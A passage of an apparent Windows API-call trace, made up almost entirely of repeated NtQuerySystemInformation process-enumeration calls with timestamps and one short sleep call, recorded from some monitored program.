NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe970) returned 0x0 [0224.605] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0227.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, 